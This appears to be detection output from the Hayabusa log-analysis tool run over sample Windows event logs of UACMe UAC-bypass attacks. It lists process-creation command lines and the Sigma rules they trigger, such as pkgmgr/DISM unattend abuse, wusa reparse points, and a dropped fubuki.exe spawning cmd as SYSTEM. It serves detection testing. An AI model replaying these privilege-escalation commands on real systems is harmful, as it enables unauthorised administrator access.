+2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:46.647 +09:00,MSEDGEWIN10,11,high,UAC Bypass Using Windows Media Player - File,,rules/sigma/file_event/file_event_uac_bypass_wmp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:46.685 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 0000028064421EA0 : Path: 
C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:47.219 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 0000028064425400 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:48.431 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\windows\system32\cmd.exe ""C:\Program Files\Windows Media Player\osk.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 32",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:48.675 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 32",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:48.696 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 318 0000028064425400 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:49.371 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: 
C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 32",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 30 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:15.579 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 0000028064427C00 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:17.433 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\syswow64\wusa.exe"" : Path: C:\Windows\SysWOW64\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 30",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:17.541 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 294 0000028064427C00 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:18.619 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\syswow64\wusa.exe"" : Path: C:\Windows\SysWOW64\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 30",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:18.694 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6312 -ip 6312",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:18.715 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\SysWOW64\WerFault.exe -u -p 6312 -s 80 : Path: C:\Windows\SysWOW64\WerFault.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\syswow64\wusa.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:18.824 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4348 -ip 4348",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 23 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool 
UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:53.943 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BCAF0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:54.900 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml : Path: C:\Windows\System32\PkgMgr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 23",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:54.972 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 406 000002806444C740 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:55.455 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml : Path: C:\Windows\System32\PkgMgr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 23",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:55.620 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\dism.exe"" /online /norestart /apply-unattend:""C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml"" : Path: 
C:\Windows\System32\Dism.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:55.620 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using PkgMgr and DISM,,rules/sigma/process_creation/win_uac_bypass_pkgmgr_dism.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:55.820 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\dism.exe"" /online /norestart /apply-unattend:""C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 22 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:13.874 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC3D0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:14.372 
+09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC9C0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:14.977 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC890 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:15.664 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC170 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:16.721 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 22",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:16.753 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 318 0000028064471300 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:16.853 
+09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 4740 -s 128 : Path: C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\SYSTEM : Parent Command: consent.exe 896 318 0000028064471300,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:16.853 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using Consent and Comctl32 - Process,,rules/sigma/process_creation/win_uac_bypass_consent_comctl32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:19.915 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: consent.exe 896 318 0000028064471300",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:20.731 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 22",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:21.128 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC500 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:21.954 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 7564 -s 152 : Path: C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\SYSTEM : Parent Command: consent.exe 
896 272 00000280644BC500,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:21.954 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using Consent and Comctl32 - Process,,rules/sigma/process_creation/win_uac_bypass_consent_comctl32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:23.554 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: consent.exe 896 272 00000280644BC500",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:23.555 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:55.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BCAF0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 37 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:15.354 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu : Path: C:\Windows\System32\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 37",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:15.364 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 400 00000280644220C0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:15.779 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu : Path: C:\Windows\System32\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 37",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:15.779 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using NTFS Reparse Point - Process,,rules/sigma/process_creation/win_uac_bypass_ntfs_reparse_point.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:27.049 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC040 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:32:34.577 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 36 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:34.577 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:35.085 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu : Path: C:\Windows\System32\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:35.137 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 400 00000280644220C0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:35.531 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu : Path: C:\Windows\System32\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:35.531 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using NTFS Reparse Point - 
Process,,rules/sigma/process_creation/win_uac_bypass_ntfs_reparse_point.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:36.794 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\dcomcnfg.exe"" : Path: C:\Windows\System32\dcomcnfg.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:36.812 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 318 0000028064471E00 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:37.160 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\dcomcnfg.exe"" : Path: C:\Windows\System32\dcomcnfg.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:37.184 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\mmc.exe C:\Windows\system32\comexp.msc : Path: C:\Windows\System32\mmc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\dcomcnfg.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:37.261 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BCAF0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p 
-s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:49.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC3D0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 22:50:26.614 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 38 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:26.614 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:27.060 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 398 000002806443AF40 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:27.356 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: huy32,wf.msc ""C:\Users\IEUser\AppData\Local\Temp\kmkze.msc"" : Path: C:\Windows\System32\mmc.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 38",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:29.424 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Local\Temp\fubuki.exe"" : Path: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe : User: MSEDGEWIN10\IEUser : Parent Command: huy32,wf.msc ""C:\Users\IEUser\AppData\Local\Temp\kmkze.msc""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:29.424 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:29.459 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\IEUser\AppData\Local\Temp\fubuki.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 39 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" 